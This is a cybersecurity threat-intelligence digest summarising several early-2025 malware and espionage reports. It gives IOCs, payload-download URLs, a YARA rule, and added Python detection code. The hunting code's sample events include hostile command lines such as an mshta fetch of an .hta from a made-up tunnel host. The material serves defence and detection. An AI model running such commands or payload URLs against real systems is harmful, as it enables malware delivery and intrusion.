The Feed 2025-01-10


Check Point Research has identified a new version of the Banshee macOS stealer malware, which has been evading detection since September 2024. The malware targets macOS users, stealing sensitive information and utilizing an encryption algorithm similar to Apple’s XProtect. Despite the shutdown of its original operations after a code leak, Banshee continues to be distributed through phishing websites and malicious GitHub repositories. Affected: macOS, GitHub

Key points:

  • Banshee macOS stealer malware has been active since September 2024.
  • Targets macOS users to steal credentials, cryptocurrency wallets, and sensitive files.
  • Utilizes a string encryption algorithm similar to Apple’s XProtect antivirus engine.
  • Evaded detection for over two months before the original version was leaked.
  • Continues to be distributed through phishing websites and GitHub repositories.
  • Employs advanced anti-analysis techniques to avoid detection.
  • Targets multiple browsers and specific cryptocurrency wallet extensions.
  • Exfiltrates stolen data via encrypted POST HTTP requests to command and control servers.
  • Threat actors have conducted over 26 campaigns distributing the new version of Banshee.

MITRE Techniques:

  • Credential Dumping (T1003): Banshee steals browser and login credentials.
  • Data Encrypted for Impact (T1486): Data is zipped and encrypted before exfiltration.
  • Command and Control (T1071): Uses HTTP for communication with command and control servers.
  • Process Injection (T1055): Employs techniques to create child processes to evade detection.
  • Phishing (T1566): Distributed through phishing websites and malicious GitHub repositories.

Indicators of Compromise:

  • [IP Address] 41.216.183.49
  • [IP Address] 41.216.183.96
  • [Domain] authorisev[.]site
  • [Domain] banshee-stealer[.]com

    Banshee: The Stealer That “Stole Code” From MacOS XProtect — Check Point Research

    Check Point Research has been monitoring a new version of the Banshee macOS stealer malware since September 2024. This malware, linked to Russian-speaking cybercriminals, targets macOS users and steals browser and login credentials, cryptocurrency wallets, and sensitive information from files [1, 2]. Banshee uses a string encryption algorithm identical to the one Apple uses in its XProtect antivirus engine for macOS [1, 3].

    One notable difference between the leaked source code and the version discovered by Check Point Research is the use of a string encryption algorithm [1]. This new version remained undetected for over two months, successfully evading detection by most antivirus engines until the original version of Banshee Stealer was leaked on XSS forums in November 2024 [1, 4, 5]. This leak led the author to shut down the operations the following day [1]. Upon analyzing the new version, Check Point Research discovered that Banshee employs the same encryption method that Apple utilizes in macOS for string encryption within its antivirus engine, XProtect [3].

    Despite the shutdown of the stealer-as-a-service operation, threat actors continue to distribute the new version of Banshee, mainly via phishing websites and malicious GitHub repositories [1, 4]. In some GitHub campaigns the same repositories targeted both platforms, delivering Lumma Stealer to Windows users and Banshee Stealer to macOS users [1, 4].

    The malware’s core functionality remains largely unchanged, with updates primarily focusing on additional anti-analysis techniques [6]. These include using the fork() function to create a child process that may escape debuggers, closing open terminal sessions, initiating a daemon in the background, and redirecting standard input, output, and error streams to /dev/null to run silently [6]. The update also removed the language check that terminated the process if Russian was detected [7].

    The newer version of the Banshee Stealer targets a wide range of browsers, including Chrome, Brave, Edge, Vivaldi, Yandex, and Opera [8]. It also targets various browser extensions, primarily those related to cryptocurrency wallets, including authenticator.cc — Authenticator, a Two-Factor Authentication (2FA) extension [8, 9]. In addition, Banshee targets specific cryptocurrency wallets on the infected machine, including Exodus, Electrum, Coinomi, Guarda, Wasabi, Atomic, and Ledger [10].

    The stealer also collects system information such as [10]:

    • Software and hardware information
    • External IP address
    • macOS password

    Banshee exfiltrates stolen data by zipping the collected data, encrypting it using the campaign ID, encoding it with Base64, and sending it via a POST HTTP request to the command and control server [11].

    The initial command and control servers ran the Django framework, but subsequent campaigns and panel developments rebuilt the Relay Server using FastAPI, providing a single option for a POST request [12]. Currently, the server hosting the admin panel is hidden behind Relay servers, making it harder to detect and disrupt [13].

    Check Point Research has observed over 26 campaigns distributing the new version of Banshee [14]. Three of these campaigns used GitHub, while others appear to use different distribution methods [14]. Many campaigns involve phishing websites impersonating popular software [14].

    One recent campaign uses a phishing website impersonating a fake Telegram chat to distribute a malicious .dmg file [15]. The website uses JavaScript to check the user’s operating system and only displays the malicious download link to macOS users [15].

    While the Banshee stealer-as-a-service officially closed on November 24, 2024, due to the original source code being leaked, threat actors continue to use updated versions of the malware in new campaigns [16, 17]. It remains unclear if these campaigns are conducted by previous customers or if the creator is still involved [16].

    IOCs

    File Hashes


    IP Addresses


    Domains


    YARA Rules

```yara
private rule macos_binary
{
    meta:
        author = "Antonis Terefos @Tera0017/@Check Point Research"
        descr = "MacOS file format"

    condition:
        // uint32() reads little-endian: FEEDFACE / FEEDFACF are 32-/64-bit Mach-O headers,
        // BEBAFECA is the byte-swapped fat (universal) binary magic CA FE BA BE
        uint32(0) == 0xFEEDFACE or uint32(0) == 0xFEEDFACF or uint32(0) == 0xBEBAFECA
}

rule banshee_macos
{
    meta:
        author = "Antonis Terefos @Tera0017/@Check Point Research"
        descr = "Banshee MacOS stealer, encrypted strings version"
        sha256 = "ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038"

    strings:
        // x64
        $x64_code_str_decr1 = {80 E1 ?? (48| 49) 89 (DE| F0| FE) (48| 49) D3 (EE| E8) (40| 44) 30 ?? 48 83 C2 08}
        $x64_code_str_decr12 = {0B 09 7D 92 2B 25 CB 9A 4C 01 40 39 8B 01 0B 4A 4B 15 00 38}
        $x64_code_str_decr2 = {48 89 ?? 48 D3 [1-18] 30 ?? 48 83 C1 08 48 FF C?}
        $x64_code_str_decr3 = {81 30 [4] C6 40 04 00}
        $x64_code_str_decr4 = {2B 25 C8 9A 4C 01 40 39 8B 01 0B 4A 4B 15 00 38 08 21 00 91}
        $x64_code_campid = {88 14 08 8A 54 31 02 48 FF C1 48 83 F9 1D}
        $x64_code_gen1 = {C6 40 09 00 31 C9 8A 14 08}
        $x64_code_gen2 = {88 14 31 8A 54 30 02 48 FF C6 84 D2}
        $x64_code_gen3 = {72 00 77 00 [17] 00 3B 00 00}

        // Arm
        $arm_code_str_decr1 = {0B 09 7D 92 2B 25 CB 9A 4C 01 40 39 8B 01 0B 4A 4B 15 00 38 08 21 00 91}
        $arm_code_str_decr2 = {2B 25 C8 9A 4C 01 40 39 8B 01 0B 4A 4B 15 00 38 08 21 00 91}
        $arm_code_campid = {6C 01 09 8B 0A 69 29 38 8A 05 40 39 29 05 00 91 3F 79 00 F1}
        $arm_code_gen1 = {1F 24 00 39 08 00 80 D2}
        $arm_code_gen2 = {72 00 77 00 [17] 00 3B 00 00}

    condition:
        // 'and' binds tighter than 'or', so the Arm branch fires without the macos_binary gate
        macos_binary and 6 of ($x64_code*) or all of ($arm_code*)
}
```
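As an added example (not Check Point's code), here is the `macos_binary` gate of the rule above re-implemented in Python. It reproduces YARA's little-endian `uint32(0)` read, which is why the fat-binary magic CA FE BA BE appears in the rule as 0xBEBAFECA, and it additionally walks the fat header to list each architecture slice, which tells an analyst whether the `$x64_code*` or the `$arm_code*` strings should be expected to match. The universal binary it builds for itself is constructed, not a Banshee sample.

```python
import struct

# Constants from the Mach-O / fat headers (mach-o/loader.h, mach-o/fat.h)
MH_MAGIC = 0xFEEDFACE         # 32-bit Mach-O; little-endian on disk, so YARA sees it as-is
MH_MAGIC_64 = 0xFEEDFACF      # 64-bit Mach-O (x86_64 and arm64 slices)
FAT_MAGIC = 0xCAFEBABE        # universal (fat) binary; fat header fields are big-endian
CPU_TYPE_X86_64 = 0x01000007
CPU_TYPE_ARM64 = 0x0100000C
CPU_NAMES = {CPU_TYPE_X86_64: "x86_64", CPU_TYPE_ARM64: "arm64"}


def yara_uint32(data: bytes, offset: int = 0) -> int:
    """What YARA's uint32(offset) returns: four bytes read little-endian."""
    return struct.unpack_from("<I", data, offset)[0]


def is_macos_binary(data: bytes) -> bool:
    """Python equivalent of the private rule's condition. The little-endian read is
    why the big-endian fat magic CA FE BA BE shows up as 0xBEBAFECA."""
    return len(data) >= 4 and yara_uint32(data) in (0xFEEDFACE, 0xFEEDFACF, 0xBEBAFECA)


def macho_slices(data: bytes) -> list[tuple[str, int, int]]:
    """Return (arch, offset, size) per Mach-O slice: one slice at offset 0 for a thin
    file, one per big-endian fat_arch entry for a universal binary, [] otherwise."""
    if len(data) < 4:
        return []
    if yara_uint32(data) in (MH_MAGIC, MH_MAGIC_64):
        cputype = yara_uint32(data, 4)          # mach_header.cputype follows the magic
        return [(CPU_NAMES.get(cputype, hex(cputype)), 0, len(data))]
    if struct.unpack_from(">I", data, 0)[0] == FAT_MAGIC:
        nfat_arch = struct.unpack_from(">I", data, 4)[0]
        slices = []
        for i in range(nfat_arch):
            # struct fat_arch { cputype, cpusubtype, offset, size, align }: five big-endian uint32
            cputype, _sub, off, size, _align = struct.unpack_from(">5I", data, 8 + 20 * i)
            slices.append((CPU_NAMES.get(cputype, hex(cputype)), off, size))
        return slices
    return []


def build_fat_sample() -> bytes:
    """Constructed universal binary (not a real sample): an x86_64 and an arm64 slice,
    each reduced to a 32-byte mach_header_64 stub, page-aligned as real fat files are."""
    def header_stub(cputype: int) -> bytes:
        return struct.pack("<II", MH_MAGIC_64, cputype) + b"\0" * 24   # remaining header fields zeroed
    cputypes = (CPU_TYPE_X86_64, CPU_TYPE_ARM64)
    stubs = [header_stub(c) for c in cputypes]
    fat = struct.pack(">II", FAT_MAGIC, len(stubs))
    offset, body = 4096, b""
    for cputype, stub in zip(cputypes, stubs):
        fat += struct.pack(">5I", cputype, 3, offset, len(stub), 12)   # align = 2**12
        body += stub.ljust(4096, b"\0")
        offset += 4096
    return fat.ljust(4096, b"\0") + body
```

YARA scans the whole file, so on a universal binary both string families can fire; the slice offsets let you carve one architecture out for disassembly.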

    Original Link: https://research.checkpoint.com/2025/banshee-macos-stealer-that-stole-code-from-macos-xprotect/

    BlueAlpha Abuses Cloudflare Tunneling Service for GammaDrop Staging Infrastructure

    BlueAlpha, a Russian state-sponsored threat group, is conducting a cyber-espionage campaign targeting Ukrainian-speaking individuals and organizations. The group has been observed delivering malicious HTML smuggling attachments through spearphishing to download and execute GammaDrop and GammaLoad malware variants. BlueAlpha leverages Cloudflare Tunnels to conceal the staging infrastructure used by GammaDrop and so evade traditional network detection mechanisms. The campaign has been ongoing since at least early 2024 and has remained largely consistent in its tactics, techniques, and procedures (TTPs), with only slight changes in tooling and infrastructure.

    Techniques:

    • HTML Smuggling: BlueAlpha uses HTML smuggling to deliver the VBScript-based GammaLoad malware.
    • Cloudflare Tunnels: BlueAlpha is abusing Cloudflare Tunnels to conceal the staging infrastructure used by GammaDrop. This allows the group to effectively evade traditional network detection mechanisms and further complicate efforts to identify and block its activities.
    • DNS fast-fluxing: BlueAlpha continues to use DNS fast-fluxing of GammaLoad command-and-control (C2) infrastructure to complicate tracking and disruption of C2 communications to preserve access to compromised systems.
    • Spearphishing: BlueAlpha continues to target Ukrainian entities with spearphishing campaigns. The spearphishing emails contain malicious HTML attachments that deliver the GammaLoad malware.

    Malware:

    • GammaDrop: An HTML application (HTA) payload used to execute and set the persistence of an embedded GammaLoad payload.
    • GammaLoad: A custom backdoor used by BlueAlpha, with variants in both PowerShell and VBScript. Its main functionality is to beacon indefinitely to its C2 server and execute any encoded VBScript it receives in the C2 responses. GammaLoad reports host information, such as the victim’s computer name and the hex-encoded serial number of the victim’s hard drive, in the User-Agent string. If the initial connection to the C2 server fails, GammaLoad uses a fast-flux DNS technique to find the latest C2 IP address. This particular GammaLoad variant uses both traditional DNS and DNS over HTTPS (DoH) for resolution.

    Infection Chain:

    • The attack starts with a spearphishing email containing a malicious HTML attachment.
    • The attachment uses XHTML smuggling to deliver a 7zip file containing a .lnk file.
    • The .lnk file uses mshta.exe to download and execute the GammaDrop .hta file from a Cloudflare Tunnel.
    • GammaDrop executes and sets the persistence of an embedded GammaLoad payload.
    • GammaLoad beacons to its C2 server and executes any commands it receives.

    IOCs

    Domains:


    IP Addresses:

    • 178.130.42[.]94

    Hashes:

    • 3afc8955057eb0bae819ead1e7f534f6e5784bbd5b6aa3a08af72e187b157c5b
    • 93aa6cd0787193b4ba5ba6367122dee846c5d18ad77919b261c15ff583b0ca17
    • b95eea2bee2113b7b5c7af2acf6c6cbde05829fab79ba86694603d4c1f33fdda

    Original Link: https://go.recordedfuture.com/hubfs/reports/cta-ru-2024-1205.pdf

    GroupGreeting e-card site attacked in “zqxq” campaign

    A widespread cyberattack, referred to as the “zqxq” campaign, compromised GroupGreeting[.]com, a popular platform used to send digital greeting cards. The attack used JavaScript injection techniques that have been seen in other large-scale malware injection campaigns, like NDSW/NDSX. Cybercriminals are taking advantage of websites with high traffic during the holidays, like greeting card websites, because there are more opportunities to target unsuspecting visitors. Over 2,800 websites have been hit with similar malicious code.

    Techniques

    • JavaScript Injection
    • Token Generation and Redirection
    • Conditional Checks and Evasion
    • Remote Payload Retrieval
    • Traffic Distribution System

    The attack was likely coordinated because of GroupGreeting.com’s high profile, seasonal traffic spikes, and the potential for the malware to persist. Once activated, the malware redirects the user to external domains that could host phishing pages or more serious malware like info stealers or ransomware.

    IOCs

    • IP Address: 104.22.78.165

    Original Link: https://www.malwarebytes.com/blog/news/2025/01/groupgreeting-e-card-site-attacked-inzqxq-campaign

    How Cracks and Installers Bring Malware to Your Device

    Threat actors are distributing malware disguised as legitimate software installers, often targeting users seeking pirated software. They lure victims through fake YouTube tutorials and use reputable file-hosting services like Mediafire and Mega.nz to distribute the malware. The malware is commonly password-protected and encoded to evade detection. Users searching for software cracks on search engines may encounter malicious links hosted on platforms like OpenSea and SoundCloud.

    Once a user downloads and executes the fake installer, it often employs techniques like process injection, DLL sideloading, and large file sizes to further evade detection. The malware collects sensitive data from web browsers, including credentials. In some cases, the initial infection leads to the download of additional malware, including various info stealers.

    Techniques:

    • Distribution via fake YouTube tutorials
    • Use of reputable file-hosting services
    • Password protection and encoding of malware
    • Search engine poisoning
    • Malicious links hosted on trusted platforms
    • Process injection
    • DLL sideloading
    • Large file sizes
    • Persistence via autorun registry entries and scheduled tasks

    Malware:

    • Info stealers (including LUMMASTEALER, PRIVATELOADER, MARSSTEALER, AMADEY, PENGUISH, VIDAR)

    Hunting Queries:

    Trend Vision One Search App

    Potential autoit script construction: parentCmd:(".exe") AND processCmd:("/c move*.cmd*&.cmd") AND objectCmd:("/c copy /b ..*+ ..*")

    Domains:

    • tech-cloud.org
    • data privacycourses.com

    Original Link: https://www.trendmicro.com/en_us/research/25/a/how-cracks-and-installers-bring-malware-to-your-device.html

    MirrorFace hackers targeting Japanese govt, politicians since 2019

    The Chinese state-backed hacking group MirrorFace (also known as Earth Kasha) has been conducting a cyber-espionage campaign targeting Japanese government entities, politicians, and technology sectors since 2019. The group aims to steal sensitive information and intelligence related to valuable technology and national security.

    Techniques

    • Exploit vulnerabilities in networking equipment
    • Employ malware for data exfiltration and persistent access
    • Use Visual Studio Code tunnels for covert communication
    • Execute malware within Windows Sandbox to evade antivirus detection

    Malware

    • MirrorStealer (credential stealer)
    • LODEINFO (backdoor)
    • ANEL
    • NOOPDOOR

    Targets

    Campaign A (2019–2023)

    • Think tanks
    • Government entities
    • Politicians
    • Media

    Campaign B (2023)

    • Semiconductor industry
    • Manufacturing industry
    • ICT
    • Academia
    • Aerospace sector

    Campaign C (2024–present)

    • Academia
    • Think tanks
    • Politicians
    • Media

    Evasion Methods

    • Visual Studio Code Tunnels: MirrorFace leverages Visual Studio Code tunnels, set up by the ANEL malware, to receive and execute commands on infected systems. This tactic, observed since at least June 2024, allows for covert communication and command execution. This tactic has been used by other Chinese state-sponsored hackers.
    • Windows Sandbox: Since June 2023, MirrorFace has been using the Windows Sandbox feature to execute LODEINFO malware in an isolated environment, bypassing antivirus detection. This method exploits the fact that the host operating system does not monitor the Windows Sandbox environment, enabling malware execution and communication with C2 servers while maintaining access to the host’s file system.

    Hunting Methods

    • Monitor suspicious PowerShell logs
    • Monitor unauthorized communication with Visual Studio Code domains
    • Monitor unusual sandbox activity
    • Configure Windows policies to audit process creation and detect Windows Sandbox launches
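The behaviours described in this and the two preceding write-ups, namely the GammaDrop chain's mshta.exe fetch from a Cloudflare Tunnel, Trend Micro's AutoIt script-construction hunt, and MirrorFace's Visual Studio Code tunnels and Windows Sandbox launches, translated into process-creation hunting rules and run over sample events. This is an added example, not code from any of the cited reports; the `Key=Value|Key=Value` event format, its field names and every sample event (hostnames, user names, file names) are constructed.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str         # full path of the created process
    cmdline: str       # its command line
    parent_image: str  # full path of the parent process


# (rule name, image regex, command-line regex, parent-image regex or None), written
# from the behaviours the reports describe; none of these is a vendor's own query.
RULES = [
    # BlueAlpha: the .lnk runs mshta.exe to fetch GammaDrop (.hta) from a Cloudflare Tunnel
    ("gammadrop_mshta_trycloudflare",
     r"\\mshta\.exe$", r"https?://[a-z0-9-]+\.trycloudflare\.com/", None),
    # Trend Micro hunt: cmd.exe under an .exe installer moving a .cmd, or gluing pieces
    # back together with "copy /b a + b" (potential AutoIt script construction)
    ("autoit_script_construction", r"\\cmd\.exe$",
     r"/c\s+move\b.*\.cmd.*&.*\.cmd|/c\s+copy\s+/b\s+\S+\s*\+\s*\S+", r"\.exe$"),
    # MirrorFace: ANEL starts a Visual Studio Code tunnel ("code tunnel") for remote commands
    ("vscode_tunnel_started", r"\\code\.exe$", r"(^|\s)tunnel(\s|$)", None),
    # MirrorFace: LODEINFO run inside Windows Sandbox, launched directly or via a .wsb config
    ("windows_sandbox_launch", r"\\WindowsSandbox\.exe$", r".*", None),
]
COMPILED = [(name, re.compile(img, re.I), re.compile(cmd, re.I),
             re.compile(par, re.I) if par else None) for name, img, cmd, par in RULES]


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'Key=Value|Key=Value' record into a ProcEvent."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return ProcEvent(fields["Image"], fields["CommandLine"], fields["ParentImage"])


def hunt(lines: list[str]) -> list[tuple[str, ProcEvent]]:
    """Return (rule name, event) for every rule that each event satisfies."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        for name, img_re, cmd_re, par_re in COMPILED:
            if (img_re.search(ev.image) and cmd_re.search(ev.cmdline)
                    and (par_re is None or par_re.search(ev.parent_image))):
                hits.append((name, ev))
    return hits


# Constructed sample events: hostnames, user names and file names are made up.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe"
    r"|CommandLine=mshta.exe https://made-up-words-here.trycloudflare.com/invoice.hta",
    r"Image=C:\Windows\System32\cmd.exe|ParentImage=C:\Users\u\Downloads\Setup.exe"
    r"|CommandLine=cmd /c move Hdz.cmd Tqp.cmd & Tqp.cmd",
    r"Image=C:\Windows\System32\cmd.exe|ParentImage=C:\Users\u\Downloads\Setup.exe"
    r"|CommandLine=cmd /c copy /b ..\Wq.pif + ..\Rk.pif ..\out.exe",
    r"Image=C:\Users\u\AppData\Local\code.exe|ParentImage=C:\Windows\System32\rundll32.exe"
    r"|CommandLine=code.exe tunnel --accept-server-license-terms",
    r"Image=C:\Windows\System32\WindowsSandbox.exe|ParentImage=C:\Windows\explorer.exe"
    r"|CommandLine=WindowsSandbox.exe C:\Users\u\run.wsb",
    r"Image=C:\Windows\System32\cmd.exe|ParentImage=C:\Windows\explorer.exe"
    r"|CommandLine=cmd /c dir",  # benign control, matches nothing
]
```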

    Original Link: https://www.bleepingcomputer.com/news/security/mirrorface-hackers-targeting-japanese-govt-politicians-since-2019/

    Recruitment Phishing Scam Imitates Hiring Process

    A phishing campaign is targeting job seekers with fake CrowdStrike recruitment emails. The emails direct victims to a website that mimics the CrowdStrike hiring process and tricks them into downloading a malicious executable disguised as a CRM application installer. Upon execution, the malware downloads and runs the XMRig cryptocurrency miner in the background, using the victim’s computing resources for mining Monero without their knowledge or consent. The executable also establishes persistence mechanisms to ensure the miner continues running even after the system is rebooted.

    Techniques

    • Phishing emails
    • Fake website mimicking a legitimate hiring process
    • Malicious executable disguised as legitimate software
    • Downloading and executing a cryptocurrency miner
    • Establishing persistence via a Windows batch script in the Start Menu Startup directory and a Windows Registry logon autostart key

    Recommendations from the source

    • Verify the authenticity of CrowdStrike communications and avoid downloading unsolicited files.
    • Educate employees on phishing tactics.
    • Monitor for suspicious network traffic.
    • Employ endpoint protection solutions to detect and block malicious activity.

    IOCs

    Domains

    • cscrm-hiring[.]com

    URLs

    • https[:]//cscrm-hiring[.]com/cs-applicant-crm-installer[.]zip
    • http[:]//93.115.172[.]41/private/aW5zdHJ1Y3Rpb25zCg==.txt
    • http[:]//github[.]com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-gcc-win64.zip

    IP Addresses

    • 93.115.172[.]41

    File Hashes

    • 96558bd6be9bcd8d25aed03b996db893ed7563cf10304dffe6423905772bbfa1 (SHA-256 hash of ZIP file containing fake CRM application executable)
    • 62f3a21db99bcd45371ca4845c7296af81ce3ff6f0adcaee3f1698317dd4898b (SHA-256 hash of fake CRM application executable)
    • 7c370211602fcb54bc988c40feeb3c45ce249a8ac5f063b2eb5410a42adcc030 (SHA-256 hash of downloaded XMRig configuration text file)

    File Paths

    • %TEMP%\System\temp.zip
    • %TEMP%\System\process.exe
    • %LOCALAPPDATA%\System32\config.exe
    • %LOCALAPPDATA%\System32\process.exe
    • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Maintenance\info.txt
    • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\startup.bat

    Registry Paths

    • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\config

    Other Indicators

    • 93.115.172[.]41:1300 (Mining Pool hosted by threat actor)

    Original Link: https://www.crowdstrike.com/en-us/blog/recruitment-phishing-scam-imitates-crowdstrike-hiring-process/



Full Research: https://medium.com/@lovable_chestnut_chinchilla_54/the-feed-2025-01-10-249c96023a51?source=rss——cybersecurity-5
